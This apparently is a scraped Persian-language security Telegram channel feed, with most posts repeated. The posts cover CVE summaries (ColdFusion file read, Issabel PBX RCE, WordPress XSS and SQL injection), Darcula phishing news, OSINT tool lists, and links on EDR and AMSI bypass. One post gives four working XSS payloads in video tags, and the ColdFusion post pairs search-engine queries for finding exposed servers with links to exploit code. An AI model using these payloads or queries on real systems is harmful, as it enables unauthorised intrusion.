پست جدید حمایت یادتون نره ممنون
https://vrgl.ir/PHnLd
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
https://vrgl.ir/PHnLd
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
ویرگول
حمله از راه دور به سبک Stuxnet با بدافزار PLC مبتنی بر وب امکان پذیر است - ویرگول
تیمی از محققان بدافزاری را طراحی کردهاند که برای هدف قرار دادن کنترلکنندههای منطقی قابل برنامهریزی مدرن (PLC) طراحی شده است تا نشان دهد…
⚡2👍1🎉1
🔴 CVE
CVE-2024-1750
یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.
تابع get_img_url/img_replace
در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.
توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.
این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-1750
یک آسیب پذیری که به عنوان بحرانی طبقه بندی شده بود، در TemmokuMVC تا 2.3 یافت شد.
تابع get_img_url/img_replace
در کتابخانه lib/images_get_down.php کامپوننت Image Download Handler تحت تأثیر قرار گرفته است. دستکاری منجر به سریال زدایی می شود. امکان انجام حمله از راه دور وجود دارد. پیچیدگی یک حمله نسبتاً زیاد است. گفته می شود که قابلیت بهره برداری دشوار است. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد. شناسه این آسیب پذیری VDB-254532 است.
توجه: با فروشنده در مورد این افشای اولیه تماس گرفته شد اما به هیچ وجه پاسخ نداد.
این آسیب پذیری قابل بهره برداری از راه دور است و پیچیدگی حمله نسبتاً زیاد است
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤1⚡1
ActiveScan++
ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:
Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)
Edge Side Includes
XML input handling
Suspicious input transformation (eg 7*7 => '49', \\ => '\' )
Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)
ActiveScan++
قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:
حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)
LINK TOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
ActiveScan++ extends Burp Suite's active and passive scanning capabilities. Designed to add minimal network overhead, it identifies application behaviour that may be of interest to advanced testers:
Potential host header attacks (password reset poisoning, cache poisoning, DNS rebinding)
Edge Side Includes
XML input handling
Suspicious input transformation (eg 7*7 => '49', \\ => '\' )
Passive-scanner issues that only occur during fuzzing (install the 'Error Message Checks' extension for maximum effectiveness)
ActiveScan++
قابلیت های اسکن فعال و غیرفعال Burp Suite را گسترش می دهد. این برنامه برای اضافه کردن حداقل هزینه های شبکه طراحی شده است و رفتار برنامه ای را که ممکن است برای تست کنندگان پیشرفته جالب باشد ، شناسایی می کند:
حملات هدر میزبان بالقوه (مسمومیت با تنظیم مجدد رمز عبور ، مسمومیت با حافظه پنهان، پیوند مجدد DNS)
لبه سمت شامل
مدیریت ورودی XML
تبدیل ورودی مشکوک (به عنوان مثال 7*7 => '49', \\ => '\' )
مشکلات اسکنر غیرفعال که فقط در طول فازینگ رخ می دهد (برای حداکثر اثربخشی ، افزونه "بررسی پیام خطا" را نصب کنید)
LINK TOOLS
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - albinowax/ActiveScanPlusPlus: ActiveScan++ Burp Suite Plugin
ActiveScan++ Burp Suite Plugin. Contribute to albinowax/ActiveScanPlusPlus development by creating an account on GitHub.
👍8🎉7👏6❤4🔥4🥰3⚡2
🔴 XSS
CVE-2024-27959
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-27959
Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Wpexpertsio WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management allows Reflected XSS.This issue affects WC Shop Sync – Integrate Square and WooCommerce for Seamless Shop Management: from n/a through 4.2.9.
LINK
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Patchstack
WordPress APIExperts Square for WooCommerce plugin <= 4.2.9 - Cross Site Scripting (XSS) vulnerability - Patchstack
Hand curated, verified and enriched vulnerability information by Patchstack security experts. Find all WordPress plugin, theme and core security issues.
🎉4👏3👍2❤1🔥1🤯1💯1
🔴 Cross-site scripting (XSS)
🔴 COD XSS SAMPEL
🔴 VIDEO
''
1- <video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
2- <video src/onerror=alert(1)>
3- <video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
4- <video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
''
نمونه های دیگر در لیست گیت های قرار میگیرد به زودی
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
🔴 COD XSS SAMPEL
🔴 VIDEO
''
1- <video controls ondurationchange=alert(1)><source src=validvideo.mp4 type=video/mp4></video>
2- <video src/onerror=alert(1)>
3- <video id=x controls onfocus=alert(1)><source src="validvideo.mp4" type=video/mp4></video>
4- <video onloadeddata=alert(1)><source src="validvideo.mp4" type="video/mp4"></video>
''
نمونه های دیگر در لیست گیت های قرار میگیرد به زودی
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍16👏11❤8🥰7🎉7🔥4🏆2
🔴شبکه فیشینگ دارکولا از RCS و iMessage برای فرار از تشخیص استفاده می کند
یک پلتفرم پیچیده فیشینگ به عنوان یک سرویس (PhaaS) به نام دارکولا ، سازمانهایی را در بیش از 100 کشور جهان با بهرهگیری از شبکهای عظیم از بیش از 20000 دامنه تقلبی برای کمک به مجرمان سایبری در راه اندازی حملات در مقیاس، هدف قرار داده است.
نت کرافت گفت : «استفاده از iMessage و
RCS به جای پیامک برای ارسال پیامهای متنی عواقب جانبی دور زدن فایروالهای SMS را دارد که برای هدف قرار دادن USPS همراه با خدمات پستی و سایر سازمانهای تاسیس شده در بیش از
100 کشور استفاده میشود.»
Darcula در چندین حمله فیشینگ با مشخصات
بالا در سال گذشته به کار گرفته شده است، که در آن پیامهای smishing برای کاربران اندروید و iOS در بریتانیا ارسال میشود، علاوه بر آن پیامهایی که تحویل بستهها را با جعل هویت سرویسهای قانونی مانند USPS فریب میدهند.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
یک پلتفرم پیچیده فیشینگ به عنوان یک سرویس (PhaaS) به نام دارکولا ، سازمانهایی را در بیش از 100 کشور جهان با بهرهگیری از شبکهای عظیم از بیش از 20000 دامنه تقلبی برای کمک به مجرمان سایبری در راه اندازی حملات در مقیاس، هدف قرار داده است.
نت کرافت گفت : «استفاده از iMessage و
RCS به جای پیامک برای ارسال پیامهای متنی عواقب جانبی دور زدن فایروالهای SMS را دارد که برای هدف قرار دادن USPS همراه با خدمات پستی و سایر سازمانهای تاسیس شده در بیش از
100 کشور استفاده میشود.»
Darcula در چندین حمله فیشینگ با مشخصات
بالا در سال گذشته به کار گرفته شده است، که در آن پیامهای smishing برای کاربران اندروید و iOS در بریتانیا ارسال میشود، علاوه بر آن پیامهایی که تحویل بستهها را با جعل هویت سرویسهای قانونی مانند USPS فریب میدهند.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
❤7🔥7👏4🎉3👍2🥰2⚡1🤯1
CVE-2024-20767 -
Arbitrary file system read using an Improper Access Control vulnerability in Adobe ColdFusion
سیستم فایل دلخواه با استفاده از یک آسیب پذیری کنترل دسترسی نامناسب
در Adobe ColdFusion
خوانده می شود
Query:
Hunter: product.name="Adobe ColdFusion"
FOFA: app="Adobe-ColdFusion"
SHODAN: http.component:"Adobe ColdFusion"
Exploit:
https://github.com/yoryio/CVE-2024-20767
https://github.com/Chocapikk/CVE-2024-20767
Blog:
https://jeva.cc/2973.html
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Arbitrary file system read using an Improper Access Control vulnerability in Adobe ColdFusion
سیستم فایل دلخواه با استفاده از یک آسیب پذیری کنترل دسترسی نامناسب
در Adobe ColdFusion
خوانده می شود
Query:
Hunter: product.name="Adobe ColdFusion"
FOFA: app="Adobe-ColdFusion"
SHODAN: http.component:"Adobe ColdFusion"
Exploit:
https://github.com/yoryio/CVE-2024-20767
https://github.com/Chocapikk/CVE-2024-20767
Blog:
https://jeva.cc/2973.html
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
🎉5❤4⚡3🔥2🥰2👍1👏1
⚙️ مقدمه ای بر Bypassing Hooks EDR
این مقاله روشهای دور زدن قلابهای EDR در حالت کاربر سیستم عامل ویندوز را بررسی میکند و با توضیح فراخوانیهای سیستم و نقش آنها در انتقال بین حالتهای کاربر و هسته شروع میشود. متعاقباً، تکنیکهای مختلفی برای دور زدن قلابها، از جمله سیستمهای مستقیم و غیرمستقیم، همراه با مزایا و محدودیتهای بالقوه آنها در هنگام استفاده از مکانیسمهای حفاظتی مورد بحث قرار میگیرند.
🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
این مقاله روشهای دور زدن قلابهای EDR در حالت کاربر سیستم عامل ویندوز را بررسی میکند و با توضیح فراخوانیهای سیستم و نقش آنها در انتقال بین حالتهای کاربر و هسته شروع میشود. متعاقباً، تکنیکهای مختلفی برای دور زدن قلابها، از جمله سیستمهای مستقیم و غیرمستقیم، همراه با مزایا و محدودیتهای بالقوه آنها در هنگام استفاده از مکانیسمهای حفاظتی مورد بحث قرار میگیرند.
🔗 https://malwaretech.com/2023/12/an-introduction-to-bypassing-user-mode-edr-hooks.html
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Malwaretech
An Introduction to Bypassing User Mode EDR Hooks
Understanding the basics of user mode EDR hooking, common bypass techniques, and their limitations.
🥰4❤3👏2🎉2⚡1🔥1🏆1
eset/nimfilt
مجموعه ای از ماژول ها و اسکریپت ها برای کمک به تجزیه و تحلیل باینری های Nim
Git Hub 🐈
🔗: https://github.com/eset/nimfilt
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
مجموعه ای از ماژول ها و اسکریپت ها برای کمک به تجزیه و تحلیل باینری های Nim
Git Hub 🐈
🔗: https://github.com/eset/nimfilt
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - eset/nimfilt: A collection of modules and scripts to help with analyzing Nim binaries
A collection of modules and scripts to help with analyzing Nim binaries - eset/nimfilt
🥰6❤2👏2🔥1🎉1
💻Research تحقیق دامنه و Ip
• Accuranker
• ahrefs - A tool for backlink research, organic traffic research, keyword research, content marketing & more.
• Alexa
• Bing Webmaster Tools
• BuiltWith
• Central Ops
• Dedicated or Not
• DNSDumpster
• DNS History
• DNSStuff
• DNSViz
• Domain Big Data
• Domain Crawler
• Domain Dossier
• Domain History
• Domain Tools - Whois lookup and domain/ip historical data.
• Easy whois
• Exonera Tor - A database of IP addresses that have been part of the Tor network. It answers the question whether there was a Tor relay running on a given IP address on a given date.
• Follow.net
• GraphyStories
• HypeStat
• Infosniper
• intoDNS
• IP Checking
• IP Location
• IP 2 Geolocation
• IP 2 Location
• IPFingerprints
• IPVoid - IP address toolset.
• IntelliTamper
• Kloth
• NetworkTools
• Majestic
• MaxMind
• MXToolbox - MX record lookup tool.
• Netcraft Site Report
• OpenLinkProfiler
• Open Site Explorer
• PageGlimpse
• Pentest-Tools.com
• PhishStats
• Pulsedive
• Quantcast
• Quick Sprout
• RedirectDetective
• Remote DNS Lookup
• Robtex
• Spyse - Scans entire internet using OSINT and collects all valuable info in its own database: Ipv4 hosts, domains/Meta/Whois, AS, TLS/SSL, Ports/Banners/Protocols, technologies, OS and much other info.
• SameID
• SecurityTrails - API to search current and historical DNS records, current and historical WHOIS, technologies used by sites and whois search for phone, email, address, IPs etc.
• SEMrush
• SEO Chat Tools
• SEOTools for Excel
• Similar Web - Compare any website traffic statistics & analytics.
• SmallSEOTools
• StatsCrop
• Squatm3gator - Enumerate available domains generated modifying the original domain name through different cybersquatting techniques
• TCPIPUTILS.com
• urlQuery
• URLVoid - Analyzes a website through multiple blacklist engines and online reputation tools to facilitate the detection of fraudulent and malicious websites.
• Wappalyzer
• WebMeUp
• Website Informer
• WhatIsMyIPAddress
• Who.is - Domain whois information.
• Whois Arin Online
• WhoIsHostingThis
• WhoisMind
• Whoisology
• WhoIsRequest
• w3snoop
• Verisign
• ViewDNS.info
• You Get Signal
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
• Accuranker
• ahrefs - A tool for backlink research, organic traffic research, keyword research, content marketing & more.
• Alexa
• Bing Webmaster Tools
• BuiltWith
• Central Ops
• Dedicated or Not
• DNSDumpster
• DNS History
• DNSStuff
• DNSViz
• Domain Big Data
• Domain Crawler
• Domain Dossier
• Domain History
• Domain Tools - Whois lookup and domain/ip historical data.
• Easy whois
• Exonera Tor - A database of IP addresses that have been part of the Tor network. It answers the question whether there was a Tor relay running on a given IP address on a given date.
• Follow.net
• GraphyStories
• HypeStat
• Infosniper
• intoDNS
• IP Checking
• IP Location
• IP 2 Geolocation
• IP 2 Location
• IPFingerprints
• IPVoid - IP address toolset.
• IntelliTamper
• Kloth
• NetworkTools
• Majestic
• MaxMind
• MXToolbox - MX record lookup tool.
• Netcraft Site Report
• OpenLinkProfiler
• Open Site Explorer
• PageGlimpse
• Pentest-Tools.com
• PhishStats
• Pulsedive
• Quantcast
• Quick Sprout
• RedirectDetective
• Remote DNS Lookup
• Robtex
• Spyse - Scans entire internet using OSINT and collects all valuable info in its own database: Ipv4 hosts, domains/Meta/Whois, AS, TLS/SSL, Ports/Banners/Protocols, technologies, OS and much other info.
• SameID
• SecurityTrails - API to search current and historical DNS records, current and historical WHOIS, technologies used by sites and whois search for phone, email, address, IPs etc.
• SEMrush
• SEO Chat Tools
• SEOTools for Excel
• Similar Web - Compare any website traffic statistics & analytics.
• SmallSEOTools
• StatsCrop
• Squatm3gator - Enumerate available domains generated modifying the original domain name through different cybersquatting techniques
• TCPIPUTILS.com
• urlQuery
• URLVoid - Analyzes a website through multiple blacklist engines and online reputation tools to facilitate the detection of fraudulent and malicious websites.
• Wappalyzer
• WebMeUp
• Website Informer
• WhatIsMyIPAddress
• Who.is - Domain whois information.
• Whois Arin Online
• WhoIsHostingThis
• WhoisMind
• Whoisology
• WhoIsRequest
• w3snoop
• Verisign
• ViewDNS.info
• You Get Signal
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
👍4🎉4❤1🥰1👏1
جایزه 5500 دلاری برای آسیبپذیری تزریق تایید نشده SQL در پلاگین وردپرس LayerSlider وصله شده است.
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Malware Analysis, News and Indicators
$5,500 Bounty Awarded for Unauthenticated SQL Injection Vulnerability Patched in LayerSlider WordPress Plugin
On March 25th, 2024, during our second Bug Bounty Extravaganza, we received a submission for an unauthenticated SQL Injection vulnerability in LayerSlider, a WordPress plugin with more than 1,000,000 estimated active installations. This vulnerability can…
❤5👍5🔥2🥰2⚡1🎉1
فهرستی از منابع (کتاب، آموزش، دوره ها، ابزارها
و برنامه های کاربردی آسیب پذیر) برای یادگیری
در مورد توسعه Exploit
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
و برنامه های کاربردی آسیب پذیر) برای یادگیری
در مورد توسعه Exploit
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - FabioBaroni/awesome-exploit-development: A curated list of resources (books, tutorials, courses, tools and vulnerable…
A curated list of resources (books, tutorials, courses, tools and vulnerable applications) for learning about Exploit Development - FabioBaroni/awesome-exploit-development
👏10👍8🎉8❤7🥰4🔥3⚡1
🔴CVE-2024-0986
Issabel PBX 4.0.0 Remote Code Execution (Authenticated) -
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Issabel PBX 4.0.0 Remote Code Execution (Authenticated) -
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated: Issabel PBX 4.0.0 Remote Code Execution (Authenticated) - CVE-2024-0986
Issabel PBX 4.0.0 Remote Code Execution (Authenticated) - CVE-2024-0986 - gunzf0x/Issabel-PBX-4.0.0-RCE-Authenticated
🔥5❤4🎉4👏2⚡1👍1
🔴 مجموعه ای از منابع برای مهندسی معکوس لینوکس
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
Link News
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
GitHub - michalmalik/linux-re-101: A collection of resources for linux reverse engineering
A collection of resources for linux reverse engineering - michalmalik/linux-re-101
🔥5👍3🎉3👏2🏆2❤1
🔴CVE
CVE-2024-4294
یک آسیبپذیری، که به عنوان بحرانی طبقهبندی شده بود، در PHPGurukul Doctor
Appointment Management System 1.0
یافت شد. تحت تأثیر این مشکل برخی از
عملکردهای ناشناخته فایل
/doctor/view-appointment-detail.php است. دستکاری آرگومان editid منجر به کنترل
نامناسب شناسه های منبع می شود. حمله ممکن است از راه دور انجام شود. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد.
VDB-262226
شناسه ای است که به این آسیب پذیری اختصاص داده شده است.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
CVE-2024-4294
یک آسیبپذیری، که به عنوان بحرانی طبقهبندی شده بود، در PHPGurukul Doctor
Appointment Management System 1.0
یافت شد. تحت تأثیر این مشکل برخی از
عملکردهای ناشناخته فایل
/doctor/view-appointment-detail.php است. دستکاری آرگومان editid منجر به کنترل
نامناسب شناسه های منبع می شود. حمله ممکن است از راه دور انجام شود. این سوء استفاده برای عموم فاش شده است و ممکن است مورد استفاده قرار گیرد.
VDB-262226
شناسه ای است که به این آسیب پذیری اختصاص داده شده است.
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
GitHub
zday1/doctor_appointment_management_system_idor.md at main · Sospiro014/zday1
test. Contribute to Sospiro014/zday1 development by creating an account on GitHub.
🔥7👍4🥰4🎉3❤2😍2👏1
☣ آسیب پذیری که منجر به AMSI BYPASS موثر می شود
AMSİ (Antimalware Scan Interface)BYPASS
آسیب پذیری است که به دلیل نقص در رابط AMSI در ویندوز، اجازه می دهد تا برنامه های مخرب AMSI را برای دستکاری و یا اجرای فایل های مخرب از طریق AMSI بیشتر از حد مورد تشخیص قرار دهند.
⚠️ این آسیب پذیری می تواند به نفع حملات malware و exploit های مخرب استفاده شود.
News
POC -
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
AMSİ (Antimalware Scan Interface)BYPASS
آسیب پذیری است که به دلیل نقص در رابط AMSI در ویندوز، اجازه می دهد تا برنامه های مخرب AMSI را برای دستکاری و یا اجرای فایل های مخرب از طریق AMSI بیشتر از حد مورد تشخیص قرار دهند.
⚠️ این آسیب پذیری می تواند به نفع حملات malware و exploit های مخرب استفاده شود.
News
POC -
♡ ⠀⠀ 〇⠀ ⠀ ⎙⠀ ⌲
ˡⁱᵏᵉ ᶜᵒᵐᵐᵉⁿᵗ ˢᵃᵛᵉ ˢʰᵃʳᵉ
K1
kasraone
OffSec
AMSI Write Raid Bypass Vulnerability | OffSec
In this blog post, we'll introduce a new bypass technique designed to bypass AMSI without the VirtualProtect API and without changing memory protection.
🥰6👍3🎉3👏2❤1⚡1🔥1